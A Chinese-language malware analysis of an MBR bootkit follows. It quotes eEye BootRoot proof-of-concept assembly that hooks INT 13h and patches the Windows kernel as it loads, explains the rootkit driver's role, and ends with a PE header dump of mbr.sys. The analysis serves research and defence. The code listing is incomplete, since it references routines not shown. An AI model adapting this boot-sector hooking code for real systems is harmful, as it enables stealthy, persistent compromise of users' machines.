原始eEye MBR代码
;===============================================================
; eEye BootRoot v0.90 Last updated: 08/08/2005
;---------------------------------------------------------------
; Demonstration of the capabilities of custom boot sector code
; on a Windows NT-family system.
;
; Derek Soeder - eEye Digital Security - 04/02/2005
;===============================================================
.486p
.model tiny
BOOTORG EQU 7C00h ; our code is executed by the BIOS at 0000h:7C00h
BOOTROOT_SIZE EQU 200h
BOOTROOT GROUP BRCODE16, BRDATA
ASSUME CS:BOOTROOT, DS:BOOTROOT, ES:BOOTROOT, SS:BOOTROOT
BRCODE16 SEGMENT byte use16
@BRCODE16_START EQU $
;###################################
;## Boot-Time Installation Code ##
;###################################
;
; Initialization
;
cli
xor bx, bx
mov ss, bx
mov ss:[BOOTORG - 2], sp
mov sp, (BOOTORG - 2)
push ds
pushad
mov ds, bx
; Reserve 1KB conventional memory for our memory-resident code
dec word ptr ds:[0413h] ; 0040h:0013h - base memory size in KBs
mov ax, ds:[0413h]
shl ax, (10-4) ; AX *= 1024 / 16 (convert linear address in KBs to a segment)
mov es, ax
; Copy ourselves to reserved memory and initialize the rest to zeroes
cld
mov si, BOOTORG
xor di, di
mov cx, BOOTROOT_SIZE / 2
rep movsw
xor ax, ax
mov ch, (1024 - BOOTROOT_SIZE) / 2 / 100h
rep stosw
; Install our INT 13h hook
mov eax, ds:[bx + (13h*4)]
mov es:[INT13HANDLER - @BRCODE16_START], eax ; store previous handler
mov word ptr [bx + (13h*4)], @Int13Hook ; point INT 13h vector to our hook handler
mov [bx + (13h*4) + 2], es ; (BX = 0 from earlier)
; Load and execute MBR from first hard drive (do this from resident code)
push es
push @BootFromHDD
retf
@BootFromHDD:
sti
mov es, cx ; CX = 0 from above REP STOSW
mov ax, 0201h ; AL = number of sectors
inc cx ; CH = cylinder; CL = sector and high bits of cylinder
mov dx, 0080h ; DH = head; DL = drive number
mov bh, (BOOTORG / 100h) ; ES:BX -> destination buffer
int 13h ; INT 13h/AH=02h: Read sector(s) into memory
popad
pop ds
pop sp
db 0EAh ; JMP FAR 0000h:7C00h
dw BOOTORG, 0000h
;##################################
;## INT 13h Hook Real-Mode ISR ##
;##################################
@Int13Hook:
pushf
cmp ah, 42h ; IBM/MS INT 13 Extensions - EXTENDED READ
je short @Int13Hook_ReadRequest
cmp ah, 02h ; DISK - READ SECTOR(S) INTO MEMORY
je short @Int13Hook_ReadRequest
popf
db 0EAh ; JMP FAR INT13HANDLER
INT13HANDLER EQU $
dd ?
@Int13Hook_ReadRequest:
mov byte ptr cs:[INT13LASTFUNCTION], ah
; Invoke original handler to perform read operation
popf
pushf ; push Flags because we're simulating an INT
call dword ptr cs:[INT13HANDLER] ; call original handler
jc short @Int13Hook_ret ; abort immediately if read failed
pushf
cli
push es
pusha
mov ah, 00h
INT13LASTFUNCTION EQU $-1
cmp ah, 42h
jne short @Int13Hook_notextread
lodsw
lodsw ; +02h WORD number of blocks to transfer
les bx, [si] ; +04h DWORD transfer buffer
@Int13Hook_notextread:
; Scan sector for a signature of the code we want to modify
test al, al
jle short @Int13Hook_scan_done
cld
mov cl, al
mov al, 8Bh
shl cx, 9 ; (AL * 200h)
mov di, bx
@Int13Hook_scan_loop:
; 8B F0 MOV ESI, EAX
; 85 F6 TEST ESI, ESI
; 74 21 JZ $+23h
; 80 3D ... CMP BYTE PTR [ofs32], imm8
; (the first 6 bytes of this signature exist in other modules!)
repne scasb
jne short @Int13Hook_scan_done
cmp dword ptr es:[di], 74F685F0h
jne short @Int13Hook_scan_loop
cmp word ptr es:[di+4], 8021h
jne short @Int13Hook_scan_loop
mov word ptr es:[di-1], 15FFh ; FFh/15h/xx/xx/xx/xx: CALL NEAR [ofs32]
mov eax, cs
shl eax, 4
add cs:[(NDISBACKDOOR_LINEAR - @BRPATCHFUNC32_START) + BRCODE16_SIZE], eax
add ax, (@PatchFunction - @BRPATCHFUNC32_START) + BRCODE16_SIZE
mov cs:[PATCHFUNC32_LINEAR], eax ; should be okay to add to AX, since we can't cross 1KB boundary
add ax, PATCHFUNC32_LINEAR - ((@PatchFunction - @BRPATCHFUNC32_START) + BRCODE16_SIZE)
mov es:[di+1], eax
@Int13Hook_scan_done:
popa
pop es
popf
@Int13Hook_ret:
retf 2 ; discard saved Flags from original INT (pass back CF, etc.)
--------------------------------------------------------------------------------------------------------
MBR rootkit加载程序勾住了13号中断用来控制NTLDR所加载的扇区。它修改了内核的两处区域:第一个是NT!IoInitSystem函数调用,第二个是内核映像的最后一页。在开始的时候rootkit调用原始nt!IoInitSystem函数并且加载它自己的驱动程序。
start end module name
804d7000 806ebc80 nt
806ebe00 806ebfff rootkit code
806ec000 806ffd80 hal
--------------------------------------------------------------------------------------------------------
Rootkit的内核驱动程序在引导过程的最后一步被加载。驱动程序是rootkit的主要部分,主要负责网络通讯和隐藏被感染扇区的真实内容。
Microsoft (R) COFF Binary File Dumper Version 6.00.8447
Copyright (C) Microsoft Corp 1992-1998. All rights reserved.
Dump of file mbr.sys
PE signature found
File Type: EXECUTABLE IMAGE
FILE HEADER VALUES
14C machine (i386)
5 number of sections
47578F69 time date stamp Thu Dec 06 06:58:01 2007
0 file pointer to symbol table
0 number of symbols
E0 size of optional header
10E characteristics
Executable
Line numbers stripped
Symbols stripped
32 bit word machine
OPTIONAL HEADER VALUES
10B magic #
7.10 linker version
9900 size of code
2F078 size of initialized data
0 size of uninitialized data
9946 RVA of entry point
480 base of code
9A80 base of data
10000 image base
80 section alignment
80 file alignment
5.00 operating system version
5.00 image version
5.00 subsystem version
0 Win32 version
3BBF8 size of image
480 size of headers
47EF6 checksum
1 subsystem (Native)
0 DLL characteristics
40000 size of stack reserve
1000 size of stack commit
100000 size of heap reserve
1000 size of heap commit
0 loader flags
10 number of directories
0 [ 0] RVA [size] of Export Directory
9C9C [ 28] RVA [size] of Import Directory
0 [ 0] RVA [size] of Resource Directory
0 [ 0] RVA [size] of Exception Directory
0 [ 0] RVA [size] of Certificates Directory
9E80 [ 2DFC] RVA [size] of Base Relocation Directory
0 [ 0] RVA [size] of Debug Directory
0 [ 0] RVA [size] of Architecture Directory
0 [ 0] RVA [size] of Special Directory
0 [ 0] RVA [size] of Thread Storage Directory
0 [ 0] RVA [size] of Load Configuration Directory
0 [ 0] RVA [size] of Bound Import Directory
9A80 [ 44] RVA [size] of Import Address Table Directory
0 [ 0] RVA [size] of Delay Import Directory
0 [ 0] RVA [size] of Reserved Directory
0 [ 0] RVA [size] of Reserved Directory
SECTION HEADER #1
.text name
95BC virtual size
480 virtual address
9600 size of raw data
480 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
E8000020 flags
Code
Not Paged
Execute Read Write
SECTION HEADER #2
.rdata name
A8 virtual size
9A80 virtual address
100 size of raw data
9A80 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
E8000040 flags
Initialized Data
Not Paged
Execute Read Write
SECTION HEADER #3
INIT name
2F6 virtual size
9B80 virtual address
300 size of raw data
9B80 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
E8000020 flags
Code
Not Paged
Execute Read Write
SECTION HEADER #4
.reloc name
2E26 virtual size
9E80 virtual address
2E80 size of raw data
9E80 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
E8000040 flags
Initialized Data
Not Paged
Execute Read Write
SECTION HEADER #5
.attach name
2EEF8 virtual size
CD00 virtual address
2EEF8 size of raw data
CD00 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
E8000040 flags
Initialized Data
Not Paged
Execute Read Write
[1] Derek Soeder Ryan Permeh, eEye BootRoot, 2005 http://research.eeye.com/html/tools/RT20060801-7.html
[2] Symantec AntiVirus Research Center, Understanding Virus Behavior under Windows NT http://www.symantec.com/avcenter/reference/virus.behavior.under.win.nt.pdf